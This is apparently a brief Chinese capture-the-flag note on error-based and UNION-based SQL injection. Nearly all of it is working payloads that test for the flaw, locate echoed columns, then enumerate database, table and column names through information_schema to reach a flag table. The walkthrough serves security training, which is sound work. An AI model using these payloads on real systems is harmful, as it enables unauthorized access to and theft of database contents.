考点:显错加联合查询
select *from user where id=1
id=1 and 1=1 回显信息
and 1=2 回显错误
id=1 and 1=2 union select 1,2,3 2,3列回显
暴库
id=1 and 1=2 union select 1,2,group_concat(schema_name) from information_schema.schemata
爆表
id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='error'
爆字段
id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='error_flag'
拿到flag
